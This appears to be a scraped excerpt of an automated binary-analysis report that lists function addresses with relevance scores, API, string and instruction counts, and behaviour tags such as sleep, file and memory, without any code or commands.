COMMON

Function 00401064 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
processsynchronizationCOMMON

Function 004077BA Relevance: 12.1, APIs: 8, Instructions: 77
COMMON

Function 00407831 Relevance: 12.1, APIs: 8, Instructions: 72
COMMON

Function 004027DF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Function 00401225 Relevance: 10.6, APIs: 7, Instructions: 87
COMMON

Function 00407070 Relevance: 10.6, APIs: 7, Instructions: 74
stringCOMMON

Function 00401EFF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35
sleepCOMMON

Function 00403A77 Relevance: 9.1, APIs: 6, Instructions: 123
COMMON

Function 004018F9 Relevance: 7.6, APIs: 5, Instructions: 79
filememoryCOMMON

Function 00405BAE Relevance: 6.1, APIs: 4, Instructions: 93
fileCOMMON

Function 00402924 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
COMMON

Function 00401DFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
stringCOMMON